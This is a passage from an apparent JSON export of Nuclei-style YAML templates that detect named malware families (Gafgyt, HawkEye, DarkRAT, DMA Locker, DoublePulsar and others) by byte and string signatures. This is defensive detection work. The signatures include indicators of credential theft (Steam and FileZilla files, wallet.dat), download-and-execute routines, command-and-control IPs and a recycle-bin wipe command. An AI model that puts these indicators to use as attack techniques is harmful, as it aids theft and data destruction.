cxpid-malware\n\ninfo:\n name: Cxpid Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cxpid.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - '/cxpid/submit.php?SessionID='\n - '/cxgid/'\n - 'E21BC52BEA2FEF26D005CF'\n - 'E21BC52BEA39E435C40CD8'\n - ' -,L-,O+,Q-,R-,Y-,S-'\n\n - type: binary\n binary:\n - \"558BECB9380400006A006A004975F9\"\n\n# digest: 4b0a00483046022100a74a127323c94ac22930026e66dd642dd77e020a5196c7595f654c18025ff3c3022100d1b6de3cb0908fd76b6556d63cd1a4b9208813f689c9e870cb1a83c55ba41970:922c64590222798bb761d5b6d8e72950\n", "hash": "3bfbfd9741e12094f6d0c3a75f98210f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d88" }, "name": "cythosia-malware.yaml", "content": "id: cythosia-malware\n\ninfo:\n name: Cythosia Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cythosia.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'HarvesterSocksBot.Properties.Resources'\n\n# digest: 490a00463044022078ad40bfbd1ef70b1a2d5f012e6f7e22f0c147b4622d3fb20bd95dca173ba3cd02207c1fd648ffed2e553b8f2d4fab5e3610c84cd330b9ec5bfcfdd6798fffcfbc68:922c64590222798bb761d5b6d8e72950\n", "hash": "38f8ac98ca26c17c9ba8c5b4d86cca76", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d89" }, "name": "darkrat-malware.yaml", "content": "id: darkrat-malware\n\ninfo:\n name: DarkRAT Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"@1906dark1996coder@\"\n - \"SHEmptyRecycleBinA\"\n - \"mciSendStringA\"\n - \"add_Shutdown\"\n - \"get_SaveMySettingsOnExit\"\n - \"get_SpecialDirectories\"\n - \"Client.My\"\n condition: and\n\n# digest: 4b0a00483046022100b1285934cddc122f08b2b6076c401a94b5fada0579234b74bc87843121e15968022100b9ac1f7a35c4b00c9cdf22c8eb46cc6b2612b90f2cf9ff89e93589db08e7139c:922c64590222798bb761d5b6d8e72950\n", "hash": "c277a3d95b2658ddf211cbb85d0c69da", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8a" }, "name": "ddostf-malware.yaml", "content": "id: ddostf-malware\n\ninfo:\n name: DDoSTf Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DDoSTf.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - 'ddos.tf'\n - 'Accept-Language: zh'\n - '%d Kb/bps|%d%%'\n condition: and\n\n - type: binary\n binary:\n - 'E8AEBEE7BDAE5443505F4B454550494E54564CE99499E8AFAFEFBC9A00'\n - 'E8AEBEE7BDAE5443505F4B454550434E54E99499E8AFAFEFBC9A00'\n condition: and\n\n# digest: 490a00463044022069c37b9b0b031a463f234c65dabef2ccf82eafbbf75453e3742a81fd59e4e222022050ab2c041ae193aa639c9d0bce242bee402c7c1f3edce808308c9eca74636193:922c64590222798bb761d5b6d8e72950\n", "hash": "2a11c9be84a497948ec7ab1ac6332a39", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8b" }, "name": "derkziel-malware.yaml", "content": "id: derkziel-malware\n\ninfo:\n name: Derkziel Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://bhf.su/threads/137898/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Derkziel.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - '{!}DRZ{!}'\n - 'User-Agent: Uploador'\n - 'SteamAppData.vdf'\n - 'loginusers.vdf'\n - 'config.vdf'\n condition: and\n\n# digest: 4a0a0047304502200d170fa9be481ceece013efa9f03701a25bf9a54312e54f49af20ff8e0005e7d02210083a9bad344313d9eca866ea080d3d24f1fce9d2dc5d75e94b83f2a3d25b8931e:922c64590222798bb761d5b6d8e72950\n", "hash": "a15ebe498b42680b2ad037d1b4692627", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8c" }, "name": "dexter-malware.yaml", "content": "id: dexter-malware\n\ninfo:\n name: Dexter Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Dexter.yar\n - http://goo.gl/oBvy8b\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Java Security Plugin'\n - '%s\\\\%s\\\\%s.exe'\n - 'Sun Java Security Plugin'\n - '\\\\Internet Explorer\\\\iexplore.exe'\n condition: and\n\n# digest: 4b0a00483046022100a9287ff95aaf311e7c3268c65e993cb4467bfbb081b6232136aa8d2dc9deea78022100b630b834786bcd6d95a436f09629e6cb330112f7306659b2a36cba93f3203811:922c64590222798bb761d5b6d8e72950\n", "hash": "9bc0ceb82e681a1bfd8e527f67870e90", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8d" }, "name": "diamondfox-malware.yaml", "content": "id: diamondfox-malware\n\ninfo:\n name: DiamondFox Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DiamondFox.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'UPDATE_B'\n - 'UNISTALL_B'\n - 'S_PROTECT'\n - 'P_WALLET'\n - 'GR_COMMAND'\n - 'FTPUPLOAD'\n condition: and\n\n# digest: 490a0046304402207f1d1ad5c528eb43a5ae2b867941575a1a1cd0461e18acc4b4ac3b88aa9da21f0220311924a7023fe7f690e204eeeec7e950603025abe55859c4af9c0281ab0f79a1:922c64590222798bb761d5b6d8e72950\n", "hash": "c060bd322242ab6e1ef90c26a3dc192c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8e" }, "name": "dmalocker-malware.yaml", "content": "id: dmalocker-malware\n\ninfo:\n name: DMA Locker Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DMALocker.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"41424358595a3131\"\n - \"21444d414c4f434b\"\n - \"21444d414c4f434b332e30\"\n - \"3F520000FFFFFFFF06000000524C4141\"\n - \"21444d414c4f434b342e30\"\n condition: or\n\n# digest: 490a00463044022019324b8f2ca02cf489e2b4b3b73d8fac28ea13d959460ce3da76a6dc9ea737b802205bb006cd82e5d13d91ac173c0e207961f79364f6205dddb16765ce48f0e43258:922c64590222798bb761d5b6d8e72950\n", "hash": "67bda4194712cfe0c32e2cd35e00b081", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d8f" }, "name": "doublepulsar-malware.yaml", "content": "id: doublepulsar-malware\n\ninfo:\n name: DoublePulsar Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DoublePulsar_Petya.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"FD0C8C5CB8C424C5CCCCCC0EE8CC246BCCCCCC0F24CDCCCCCC275C9775BACDCCCCC3FE\"\n - \"45208D938D928D918D90929391970F9F9E9D99844529844D20CCCDCCCC9B844503844514844549CC3333332477CCCCCC844549C43333332484CDCCCC844549DC333333844749CC333333844741\"\n condition: or\n\n# digest: 4b0a00483046022100fecba2c76000ce4dc747b32d5a6c2db3b0fc1153f64c279ad5f81dc6f68ad056022100fc9cbbcfa1a0cec80ecef08d1a0d0b541d4154be1961c02789d91642a57604e4:922c64590222798bb761d5b6d8e72950\n", "hash": "fad7a3ad0914f47d32ba4ea14ba9b14e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d90" }, "name": "eicar-malware.yaml", "content": "id: eicar-malware\n\ninfo:\n name: Eicar Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Eicar.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*\"\n\n# digest: 4a0a0047304502207975a5baa7107c29fa43d0d09d14a1f330d75cc2c90e7e2959de621616bd920c022100aab3bdba5f0777409100b22da60d51f2bca3a630df47a3e1335c29d9eebacb7b:922c64590222798bb761d5b6d8e72950\n", "hash": "55703247fd4bab9254b07a85cac7927b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d91" }, "name": "erebus-malware.yaml", "content": "id: erebus-malware\n\ninfo:\n name: Erebus Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Erebus.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log\"\n - \"EREBUS IS BEST.\"\n condition: and\n\n# digest: 4a0a00473045022100b2c9308c6baa68c3f36be6375b9d4a08cbee7b2b76334063f64375c58a584c1a022014e00fe5cedabd573b20e277bfef437e04d245b551f692e451eea6a13297d093:922c64590222798bb761d5b6d8e72950\n", "hash": "2e41b8480e215dcaacf4284f7d0a0061", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d92" }, "name": "ezcob-malware.yaml", "content": "id: ezcob-malware\n\ninfo:\n name: Ezcob Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Ezcob.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - '\\x12F\\x12F\\x129\\x12E\\x12A\\x12E\\x12B\\x12A\\x12-\\x127\\x127\\x128\\x123\\x12'\n - '\\x121\\x12D\\x128\\x123\\x12B\\x122\\x12E\\x128\\x12-\\x12B\\x122\\x123\\x12D\\x12'\n - 'Ezcob'\n - 'l\\x12i\\x12u\\x122\\x120\\x121\\x123\\x120\\x124\\x121\\x126'\n - '20110113144935'\n condition: or\n\n# digest: 4b0a00483046022100d6413aad4692251618745a1305877e38ef6a0265199e5593006c6941238b5727022100f9b2270f44ab1e5a8aab94ad046274a148e26d8b9357279e8a3bf2d38218ebc6:922c64590222798bb761d5b6d8e72950\n", "hash": "2f586449c1728490111fc3b52e1e412a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d93" }, "name": "fudcrypt-malware.yaml", "content": "id: fudcrypt-malware\n\ninfo:\n name: FUDCrypt Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/gigajew/FudCrypt/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FUDCrypt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'OcYjzPUtJkNbLOABqYvNbvhZf'\n - 'gwiXxyIDDtoYzgMSRGMckRbJi'\n - 'BclWgISTcaGjnwrzSCIuKruKm'\n - 'CJyUSiUNrIVbgksjxpAMUkAJJ'\n - 'fAMVdoPUEyHEWdxQIEJPRYbEN'\n - 'CIGQUctdcUPqUjoucmcoffECY'\n - 'wcZfHOgetgAExzSoWFJFQdAyO'\n - 'DqYKDnIoLeZDWYlQWoxZnpfPR'\n - 'MkhMoOHCbGUMqtnRDJKnBYnOj'\n - 'sHEqLMGglkBAOIUfcSAgMvZfs'\n - 'JtZApJhbFAIFxzHLjjyEQvtgd'\n - 'IIQrSWZEMmoQIKGuxxwoTwXka'\n\n# digest: 4a0a004730450220551ad1f48b67447105de1dfeb2283e4894300d7a04b4f462ded8efb032531660022100fd607a6ae4731a63a068a4047c8d8f3b51f4f398e8c00da9c90123662ac275c6:922c64590222798bb761d5b6d8e72950\n", "hash": "8929399efb32c48a5a4dc1c298402211", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d94" }, "name": "gafgyt-bash-malware.yaml", "content": "id: gafgyt-bash-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PONG!'\n - 'GETLOCALIP'\n - 'HTTPFLOOD'\n - 'LUCKYLILDUDE'\n condition: and\n\n# digest: 490a004630440220288713ec4bd6977eff7ff75df4f036ef52f817f9dfe2e40dd236505b71a6b3fe02202a06c8127b4cf5382386c17d9314bc3cbd4ebc39f573cfd5c4048b416bef314c:922c64590222798bb761d5b6d8e72950\n", "hash": "c4b00d1a855e9a771761fc85455f5020", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d95" }, "name": "gafgyt-generic-malware.yaml", "content": "id: gafgyt-generic-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"/bin/busybox;echo -e 'gayfgt'\"\n - '/proc/net/route'\n - 'admin'\n - 'root'\n condition: and\n\n# digest: 4a0a00473045022100a436723552485c6e8cc638338d9303400a69c5e8dc1e1e9e57a1376af7cb4cee02203fce2be6541cb69686c31e611bb3800f4e3eb94eda45d82679d7e336e96a78ec:922c64590222798bb761d5b6d8e72950\n", "hash": "2ff7fd8f58f80babb618f9f75165345d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d96" }, "name": "gafgyt-hihi-malware.yaml", "content": "id: gafgyt-hihi-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PING'\n - 'PONG'\n - 'TELNET LOGIN CRACKED - %s:%s:%s'\n - 'ADVANCEDBOT'\n - '46.166.185.92'\n - 'LOLNOGTFO'\n condition: and\n\n# digest: 4a0a0047304502202b4ae96e807e07b5a92453399994ce2d360a5262c5f42de79da60ca5e61ffdf9022100e101b40699838926c53e2672358afec4eb70034f8057f3139d9471d06218d0ec:922c64590222798bb761d5b6d8e72950\n", "hash": "a6ab2a24e733973e8fdc2cc8f4cdee84", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d97" }, "name": "gafgyt-hoho-malware.yaml", "content": "id: gafgyt-hoho-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PING'\n - 'PRIVMSG'\n - 'Remote IRC Bot'\n - '23.95.43.182'\n condition: and\n\n# digest: 490a0046304402204caa36b7085382217c68b836ba02e409b7a9d1cc06a53445152789adaa6c8d5e02204838d1ce8e133534ecaeb957858422d28886ab366b5d0cdfa3aabfb343e3f83a:922c64590222798bb761d5b6d8e72950\n", "hash": "8b7a52b6db0e97ea7acf065b34a35759", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d98" }, "name": "gafgyt-jackmy-malware.yaml", "content": "id: gafgyt-jackmy-malware\n\ninfo:\n name: Gafgyt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'PING'\n - 'PONG'\n - 'jackmy'\n - '203.134.%d.%d'\n condition: and\n\n# digest: 4b0a004830460221009f75b155ff1a6cf0f9a2e515fbefc0ee6844cabc036c2f3d06c74a219756f795022100fba0315b774cdd5dd17543a17c7a5b57ed9926583ffb40b32e940bd6b1407968:922c64590222798bb761d5b6d8e72950\n", "hash": "447c07fb5d5aeca0e536fc77d07c00d8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d99" }, "name": "gafgyt-oh-malware.yaml", "content": "id: gafgyt-oh-malware\n\ninfo:\n name: Gafgyt Oh Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'busyboxterrorist'\n - 'BOGOMIPS'\n - '124.105.97.%d'\n - 'fucknet'\n condition: and\n\n# digest: 4a0a0047304502203cc1627cee509aef93e68476939f3d1e2fc7371357a73b47ed730dc272ed7d56022100f4d1eeddad80745d41b9eb5c1c9cb7b661d8d764628eaa2b21bba7a5abf0bcda:922c64590222798bb761d5b6d8e72950\n", "hash": "c2acc75835f6b733b62a2af432702f9d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9a" }, "name": "genome-malware.yaml", "content": "id: genome-malware\n\ninfo:\n name: Genome Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Genome.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'Attempting to create more than one keyboard::Monitor instance'\n - '{Right windows}'\n - 'Access violation - no RTTI data!'\n condition: and\n\n# digest: 4b0a004830460221008e67d4a702001206e2838ed87a09a2d6dc3a0a423643a3b19fab912895944d3c022100d8d561eda4eb5f713345d6e04db0b1f2e27daa13009c62a27c9ee08888f91b23:922c64590222798bb761d5b6d8e72950\n", "hash": "c80977fdacfceacf29e51781139bda6b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9b" }, "name": "glass-malware.yaml", "content": "id: glass-malware\n\ninfo:\n name: Glass Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Glass.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"PostQuitMessage\"\n - \"pwlfnn10,gzg\"\n - \"update.dll\"\n - \"_winver\"\n condition: and\n\n# digest: 4b0a00483046022100fcc6a253c1cdfca1770ded4ccd721e5afc7ed561be162c18d0f614b63ae0efcf022100e1a58b609f151bbaa49837795a9f58a042d7c54b320bd63841a558743c131d6f:922c64590222798bb761d5b6d8e72950\n", "hash": "b017d9188aaf10165c80c8b522cf6997", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9c" }, "name": "glasses-malware.yaml", "content": "id: glasses-malware\n\ninfo:\n name: Glasses Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Glasses.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - 'thequickbrownfxjmpsvalzydg'\n - 'Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)'\n - '\" target=\"NewRef\">'\n condition: and\n\n - type: binary\n binary:\n - \"B8ABAAAAAAF7E1D1EA8D04522BC8\"\n - \"B856555555F7E98B4C241C8BC2C1E81F03D0493BCA\"\n condition: or\n\n# digest: 490a0046304402206c19fd7664b98e1beacc91b5cefd899284e3b9db9a5496b2d1b8c11ad06ee77e02204d59c759c20e30834d429d754f136bc7b70d841a6c2e128611028841235f1a8f:922c64590222798bb761d5b6d8e72950\n", "hash": "0b528bb5cb0c6e6390050cdc964bce7a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9d" }, "name": "gozi-malware.yaml", "content": "id: gozi-malware\n\ninfo:\n name: Gozi Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gozi.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500\"\n\n# digest: 4a0a004730450220461dc17288917677ebacf3d4c6deda849d7ed8ff2fe3359d83699d44a161bee402210093eea6ed3ce4a7a060970f7c6ccf74ccf21072494021cf544172d346785bba79:922c64590222798bb761d5b6d8e72950\n", "hash": "22205dd393a0d8566ebd3adc53a44471", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9e" }, "name": "gpgqwerty-malware.yaml", "content": "id: gpgqwerty-malware\n\ninfo:\n name: GPGQwerty Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_GPGQwerty.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"gpg.exe –recipient qwerty -o\"\n - \"%s%s.%d.qwerty\"\n - \"del /Q /F /S %s$recycle.bin\"\n - \"cryz1@protonmail.com\"\n condition: and\n\n# digest: 4a0a00473045022075d6b8b24de31fa7102eb77cb2017df3222bd2503952eccfc5b2df8b0050602c02210099773f7ad192a738d66c6158fe6c3ed780b2853160405731d3e392ca415001c9:922c64590222798bb761d5b6d8e72950\n", "hash": "c36e9f1b3c5f6d90128ebd8c62b1340e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d9f" }, "name": "greame-malware.yaml", "content": "id: greame-malware\n\ninfo:\n name: Greame Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"EditSvr\"\n - \"TLoader\"\n - \"Stroks\"\n - \"Avenger by NhT\"\n - \"####@####\"\n - \"GREAME\"\n condition: and\n\n - type: binary\n binary:\n - \"232323234023232323E8EEE9F9232323234023232323\"\n - \"232323234023232323FAFDF0EFF9232323234023232323\"\n condition: and\n\n# digest: 490a004630440220033cb352a6c026a34645d20c297b5c3ea9243c1d98830fc03c61e0b633f085e102201e7ec4e2892ccaf6dcacfae3b5395acb8dd0da6311a4caa0373e67014d681af1:922c64590222798bb761d5b6d8e72950\n", "hash": "47f22ed42161c55ae70ed399fb9a51c7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da0" }, "name": "grozlex-malware.yaml", "content": "id: grozlex-malware\n\ninfo:\n name: Grozlex Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Grozlex.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E\"\n\n# digest: 4b0a00483046022100b2982d797690c09fbb5a52a4acd50c97065486d840366ebe849db40f091a051a022100b320ef03f51e8f1a2dab81c0591e69900e265252316c08f0711442b99f12650b:922c64590222798bb761d5b6d8e72950\n", "hash": "5dd4800dcc34e6d881a46a43fb22d316", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da1" }, "name": "hawkeye-malware.yaml", "content": "id: hawkeye-malware\n\ninfo:\n name: HawkEye Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"HawkEyeKeylogger\"\n - \"099u787978786\"\n - \"HawkEye_Keylogger\"\n - \"holdermail.txt\"\n - \"wallet.dat\"\n - \"Keylog Records\"\n - \"\"\n - \"\\\\pidloc.txt\"\n - \"BSPLIT\"\n condition: and\n\n# digest: 4a0a004730450221009d0d74bbb3d7f02cd3e3f6f0b539b399ccf1b22147a164d8bcddd5fabdc5c54c02202f69f83003e25a2a80e7755f4048d6f34278c80ce5aacb40d25c177948161cd6:922c64590222798bb761d5b6d8e72950\n", "hash": "021341510ca420e5334301b34c4986cd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da2" }, "name": "hydracrypt-malware.yaml", "content": "id: ransomware_windows_hydracrypt\n\ninfo:\n name: Hydracrypt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara\n tags: malware,file,hydracrypt\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"oTraining\"\n - \"Stop Training\"\n - \"Play \\\"sound.wav\\\"\"\n - \"&Start Recording\"\n - \"7About record\"\n condition: and\n\n# digest: 4a0a004730450220408bdc9a1276d1da11b112f8fbd617c84176a4a4c239a3669f2cd26ed6d9a1aa022100c8c051a81f80c4eca9ee7ef902bb5336a9d79bcccb991e35aa4dfd533e5dbb03:922c64590222798bb761d5b6d8e72950\n", "hash": "1efe62aa850b97074cefc8704554cca1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da3" }, "name": "imminent-malware.yaml", "content": "id: imminent-malware\n\ninfo:\n name: Imminent Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"DecodeProductKey\"\n - \"StartHTTPFlood\"\n - \"CodeKey\"\n - \"MESSAGEBOX\"\n - \"GetFilezillaPasswords\"\n - \"DataIn\"\n - \"UDPzSockets\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"k__BackingField\"\n - \"k__BackingField\"\n - \"DownloadAndExecute\"\n - \"england.png\"\n - \"-CHECK & PING -n 2 127.0.0.1 & EXIT\"\n - \"Showed Messagebox\"\n condition: and\n\n# digest: 4a0a0047304502206e2f6dc27e1c37ff961d32317adaa25228ebc6996fe5bc91b0e2cdff3c5bee57022100b72c085e7b2c4bef399e91106089e1f999df023718d984781d37a80974c42b41:922c64590222798bb761d5b6d8e72950\n", "hash": "ad195f9e405b9fc4956c868093425c76", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da4" }, "name": "infinity-malware.yaml", "content": "id: infinity-malware\n\ninfo:\n name: Infinity Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"CRYPTPROTECT_PROMPTSTRUCT\"\n - \"discomouse\"\n - \"GetDeepInfo\"\n - \"AES_Encrypt\"\n - \"StartUDPFlood\"\n - \"BATScripting\"\n - \"FBqINhRdpgnqATxJ.html\"\n - \"magic_key\"\n condition: and\n\n# digest: 490a0046304402206e7b4d78d5bef2155ee5f2c63a83a5b744fa98a1a5d8da69cabd566de79dc17b022017ce798b08acdf07a11c2949bcf220b510955c404d383bfa3b32b998ac20663e:922c64590222798bb761d5b6d8e72950\n", "hash": "701eb08d7c7202c49b8d2ee15e8efda8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da5" }, "name": "insta11-malware.yaml", "content": "id: insta11-malware\n\ninfo:\n name: Insta11 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Install11.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - 'XTALKER7'\n - 'Insta11 Microsoft'\n - 'wudMessage'\n - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1'\n - 'B12AE898-D056-4378-A844-6D393FE37956'\n condition: or\n\n - type: binary\n binary:\n - 'E9000000006823040000'\n\n# digest: 4a0a00473045022100887f3b0bb545f5a3710ed0e8ea19c1ce2ae9d7e8ba5af80161713d098c780019022038488e87fe95df609cff973f6771b681bbb74de4bbeee489a9af535c7cee7b02:922c64590222798bb761d5b6d8e72950\n", "hash": "fb4fde185db128f9f7967b9bc4c86ebe", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da6" }, "name": 